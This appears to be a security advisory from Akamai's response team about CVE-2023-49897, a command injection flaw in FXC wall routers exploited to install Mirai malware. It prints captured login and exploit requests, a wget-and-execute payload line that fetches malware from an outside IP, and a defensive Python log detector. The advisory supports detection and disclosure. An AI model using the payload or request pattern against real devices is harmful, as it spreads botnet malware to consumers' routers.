Actively Exploited Vulnerability in FXC Routers: Fixed, Patches Available
This blog post is an update to a previous post by the SIRT on the InfectedSlurs campaign.
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an update to the InfectedSlurs advisory series now that one of the affected vendors has released patched firmware versions and guidance.
The vulnerability has been given the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.
Among the affected routers are Future X Communications (FXC) AE1021 and AE1021PE outlet wall routers, running firmware versions 2.0.9 and earlier.
The malicious payloads captured in the wild install a Mirai-based malware with the intention of creating a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
Need to know
As part of the InfectedSlurs discovery, the SIRT uncovered a vulnerability in FXC AE1021 and AE1021PE outlet wall routers that are being actively exploited in the wild. This device is described as an outlet-based wireless LAN router for hotels and residential units. It is manufactured in Japan by FXC. This vulnerability has been assigned the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. The payloads captured in the wild authenticate using the device's default credentials.
The impacted firmware versions are:
AE1021PE firmware version 2.0.9 and earlier
AE1021 firmware version 2.0.9 and earlier
The vendor (FXC) has released a patched version of the device's firmware that corrects the vulnerability. The vendor suggests device owners update to firmware version 2.0.10 as soon as possible. They also recommend owners do a factory reset of the device and change the default management screen login password on the first boot.
The vendor advisory can be found at https://www.fxc.jp/news/20231206. JPCERT has also published an advisory at https://jvn.jp/en/vu/JVNVU92152057/ (Japanese release: https://jvn.jp/vu/JVNVU92152057/).
Exploitation observed
The payloads identified in the wild involve the installation of a Mirai-based malware. The campaign is building a botnet aimed at facilitating DDoS attacks — the botnet itself was covered in detail in our initial post.
It’s hard to estimate how many devices in the wild are potentially compromisable or actively compromised because the captured attack payloads rely on the devices’ use of factory default authentication credentials.
Because exploitation requires authentication, two distinct attacker interactions were observed. We believe the first of these interactions is merely a fingerprinting attempt. It targets the /cgi-bin/login.apply endpoint URL using default credentials (Figure 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Fig. 1: FXC outlet wall router authentication attempt
If the authentication is successful, an exploit payload is delivered to the /cgi-bin/action endpoint URL approximately three seconds later (Figure 2).
URL: /cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Fig. 2: FXC outlet wall router exploitation attempt
The raw exploit payloads captured in the wild attempt to leverage the OS command injection vulnerability to distribute a MIPS-compiled variant of Mirai (Figure 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Fig. 3: Remote code execution payloads observed in the wild
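The two-stage sequence in Figures 1 through 3 is easy to express as detection logic over management-interface access logs. The Python below is an added example for defenders, not Akamai's code and not the Snort or YARA rules from the original research: it correlates a scripted POST to /cgi-bin/login.apply with a POST to /cgi-bin/action a few seconds later whose ntp.general.hostname value is not a hostname at all, and it flags any reference to the download host seen in Figure 3. The pipe-delimited log format, the source addresses, the REDACTED credential placeholders and the 10-second correlation window are assumptions; the endpoint paths, the parameter name, the User-Agent and the download host come from the captures above.

```python
"""Detect the FXC AE1021 two-stage exploitation pattern (CVE-2023-49897) in access logs.

Added example, not Akamai code. Log line format is an assumption:
    timestamp|src_ip|method|path|user_agent|post_body
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

LOGIN_PATH = "/cgi-bin/login.apply"      # stage 1: login with default credentials (Fig. 1)
ACTION_PATH = "/cgi-bin/action"          # stage 2: settings POST carrying the injection (Fig. 2)
INJECTED_PARAM = "ntp.general.hostname"  # parameter that held [RCE] in the capture
KNOWN_DOWNLOAD_HOSTS = {"45.142.182.96"}  # payload host seen in Fig. 3
LOGIN_TO_EXPLOIT_WINDOW = timedelta(seconds=10)  # capture showed ~3 s between stages (assumed window)

# Scripted clients; the capture used Go-http-client/1.1.
AUTOMATION_UA = re.compile(r"^(Go-http-client|curl|python-requests|Wget)/", re.I)
# Characters that never belong in an NTP server hostname.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")
# RFC 1123 hostname grammar; anything outside it is suspicious in this field.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\.?$")

# Constructed sample log: one attacker chain, one fingerprint-only probe, one legitimate admin.
SAMPLE_LOG = """\
2023-10-28T13:40:00Z|198.51.100.7|POST|/cgi-bin/login.apply|Go-http-client/1.1|username_input=REDACTED&password_input=REDACTED&lang=ja_JP&hashstr=202310281340&username=REDACTED&password=REDACTED
2023-10-28T13:40:03Z|198.51.100.7|POST|/cgi-bin/action|Go-http-client/1.1|page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=cd+%2Ftmp%3B+rm+-rf+mips%3B+wget+http%3A%2F%2F45.142.182.96%2Fspl%2Fmips%3B+chmod+777+mips%3B+.%2Fmips+accessedge&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
2023-10-28T14:02:11Z|192.0.2.44|POST|/cgi-bin/login.apply|Go-http-client/1.1|username_input=REDACTED&password_input=REDACTED&lang=ja_JP&username=REDACTED&password=REDACTED
2023-10-28T18:30:45Z|10.0.0.5|POST|/cgi-bin/login.apply|Mozilla/5.0 (Windows NT 10.0; Win64; x64)|username_input=REDACTED&password_input=REDACTED&lang=ja_JP&username=REDACTED&password=REDACTED
2023-10-28T18:31:20Z|10.0.0.5|POST|/cgi-bin/action|Mozilla/5.0 (Windows NT 10.0; Win64; x64)|page_suc=i_system_reboot.htm&ntp.general.hostname=ntp.nict.jp&ntp.general.enable=1
"""


def parse_log(text):
    """Split pipe-delimited lines into event dicts, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, path, ua, body = line.split("|", 5)
        events.append({"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "src": src, "method": method, "path": path, "ua": ua, "body": body})
    return sorted(events, key=lambda e: e["time"])


def inspect_hostname(body):
    """Return the reasons the ntp.general.hostname value looks injected ([] if it is clean)."""
    params = parse_qs(body, keep_blank_values=True)
    reasons = []
    for value in params.get(INJECTED_PARAM, []):
        if SHELL_META.search(value):
            reasons.append("shell metacharacters in hostname")
        if not HOSTNAME_RE.match(value):
            reasons.append("value is not a valid hostname")
        for host in KNOWN_DOWNLOAD_HOSTS:
            if host in value:
                reasons.append(f"references known payload host {host}")
    return reasons


def analyze(events):
    """Correlate scripted logins with a following injection attempt from the same source."""
    findings = []
    last_login = {}  # src_ip -> time of its most recent login.apply POST
    for e in events:
        if e["method"] != "POST":
            continue
        if e["path"] == LOGIN_PATH:
            last_login[e["src"]] = e["time"]
            if AUTOMATION_UA.match(e["ua"]):
                findings.append({"severity": "medium", "src": e["src"], "time": e["time"],
                                 "rule": "scripted login to management interface",
                                 "detail": e["ua"]})
        elif e["path"] == ACTION_PATH:
            reasons = inspect_hostname(e["body"])
            if not reasons:
                continue
            prior = last_login.get(e["src"])
            chained = prior is not None and e["time"] - prior <= LOGIN_TO_EXPLOIT_WINDOW
            findings.append({"severity": "high", "src": e["src"], "time": e["time"],
                             "rule": "CVE-2023-49897 command injection attempt",
                             "detail": "; ".join(reasons),
                             "chained_after_login": chained})
    return findings


if __name__ == "__main__":
    for f in analyze(parse_log(SAMPLE_LOG)):
        print(f"{f['time'].isoformat()} {f['severity']:6} {f['src']:14} {f['rule']} ({f['detail']})")
```

On the constructed sample this yields one high-severity finding for the chained attacker, a medium-severity note for the fingerprint-only probe, and nothing for the administrator who sets a real NTP hostname from a browser. The hostname grammar check is the part worth keeping even after patching: a settings field that accepts shell metacharacters is a detection opportunity regardless of which firmware bug is being exercised.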
In our initial publication, the Akamai SIRT team provided an extensive list of IOCs, Snort rules, and YARA rules to help identify these exploit attempts in the wild and possible active infections on defender networks.
Conclusion
Internet of Things (IoT)–targeted campaigns result in countless instances in which everyday consumer devices are unwittingly enlisted in a number of malicious efforts. DDoS botnets and cryptomining schemes are just some of the potential outcomes that can happen completely unbeknownst to the consumer whose device is affected. In some cases, the user may not even know the credentials could be changed on these devices at all.
This revelation underscores the necessity for increased awareness and education regarding IoT best practices and the associated risks for the average consumer. The need for awareness isn’t exclusive to consumers — it also applies to manufacturers of these “set it and forget it” devices.
Basic security practices matter
The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.
Stay tuned
The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.
The Akamai SIRT would like to take a moment to thank CISA, US-CERT, JPCERT, and FXC for assistance with communications, coordination, identification, remediation, and disclosure efforts.
We would also like to thank Ryu Kuki, Takayuki Sasaki, and Katsunari Yoshioka of Yokohama National University for their diligent work. Although we didn’t get to work with them directly, it was brought to our attention that they had reported the same vulnerability to JPCERT and FXC at roughly the same time as our own reports. It’s always great to find fellow defenders taking active roles in making the internet a better and more secure place for everyone.